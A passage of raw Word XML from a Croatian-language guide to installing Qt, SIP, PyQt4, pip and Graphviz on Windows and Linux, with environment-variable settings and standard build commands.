          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Pr. 1</w:t>
      </w:r>
      <w:r w:rsidR="000C77D4">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>„;C:\Qt\5.3\android_armv7\bin;“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="00012366" w:rsidRDefault="000C77D4" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Nap</w:t>
      </w:r>
      <w:r w:rsidR="000C77D4" w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>omena</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C77D4" w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>orisnici trebaju pripaziti da ne ostavljaju prostora ispred prethodnog puta, dvotočke i puta koji dodaju jer u suprotnom neće ispravno raditi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="000C77D4" w:rsidRDefault="000C77D4" w:rsidP="000C77D4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pr. 2. Neispravno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>prvi_put; drugi_put</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="00012366" w:rsidRDefault="000C77D4" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Pr. 3. Ispravno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>prvi_put;drugi_put</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="000C77D4" w:rsidRDefault="000C77D4" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Linux korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Linux korisnici trebaju pokrenuti .run datoteku pritom koristeći root dozvolu. Nakon toga moraju namjes</w:t>
      </w:r>
      <w:r w:rsidR="00F82890">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>iti postavke okruženja, a to se napravi tako da se doda sljedeći kod na kraju /etc/profile :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>QTDIR=/opt/QtSDK/Desktop/Qt/473/gcc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>PATH=$QTDIR/bin:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>LD_LIBRARY_PATH=$QTDIR/lib:$LD_LIBRARY_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Export QTDIR PATH LD_LIBRARY_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Zatim se spremi i izađe te se izvrše naredbe „</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>source /etc/profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>“ te „</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>sudo updatedb</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Ako se može iz</w:t>
      </w:r>
      <w:r w:rsidR="00F82890">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ršiti naredba „</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>qmake -v</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>“ i pritom se prikaže informacija verzije, znači da je Qt uspješno instaliran.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="00012366" w:rsidRDefault="000C77D4" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc406756479"/>
      <w:bookmarkStart w:id="16" w:name="_Toc406756592"/>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Instalacija SIP-a</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Windows korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Windows korisnici ovaj korak mogu preskočiti te otići na sljedeći.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="00012366" w:rsidRDefault="000C77D4" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Linux korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux korisnici mogu preuzeti SIP sa stranice </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="000C77D4">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>http://www.riverbankcomputing.com/software/sip/download</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Nakon toga, prvo se treba instalirati python-dev da ne bi bilo grešaka tijekom izvršavanja naredbe make. Zatim se u konzoli dođe do direktorija koji sadrži preuzete datoteke te se trebaju izvršiti naredbe sljedećim redoslijedom:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>python configure.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>make install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="000C77D4" w:rsidRDefault="000C77D4" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc406756480"/>
      <w:bookmarkStart w:id="18" w:name="_Toc406756593"/>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Instalacija PyQTx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="00B51E23">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">PyQTx se preuzima sa stranice </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="000C77D4" w:rsidRPr="000C77D4">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>http://sourceforge.net/projects/pyqt/files/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Preporuč</w:t>
      </w:r>
      <w:r w:rsidR="00B51E23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>uje</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> se preuzimanje PyQT4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Windows korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Windows korisnici trebaju obratiti posebnu pažnju na dohvaćanje ispravne verzije, odnosno verzije specifične za Python 2.7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="00012366" w:rsidRDefault="000C77D4" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Linux korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux korisnici dohvaćaju inačicu </w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>*-x11-*.tar.gz</w:t>
      </w:r>
      <w:r w:rsidR="00B51E23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> te na</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>kon toga redom izvršavaju sljedeće naredbe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">tar xvfz PyQT-x11-verzija.tar.gz </w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>(umjesto verzija ide verzij</w:t>
      </w:r>
      <w:r w:rsidR="00B51E23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>a do</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00B51E23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>aćene datoteke, npr. gpl-4.8.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">python configure.py –g </w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>(zatim se odabere „yes“)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>make install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc406756481"/>
      <w:bookmarkStart w:id="20" w:name="_Toc406756594"/>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Instalacija alata pip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Ovo je opcionalan, ali preporučljiv korak jer olakšava daljnje korake. Dohvati se get-pip.py sa stranice </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="000C77D4" w:rsidRPr="000C77D4">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>https://pip.pypa.io/en/latest/installing.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, te dohvaćena datoteka instalira pip naredbom </w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>python get-pip.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc406756482"/>
      <w:bookmarkStart w:id="22" w:name="_Toc406756595"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00012366" w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>nstalacija alata Graphviz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Graphviz se dohvaća sa stranice </w:t>
      </w:r>
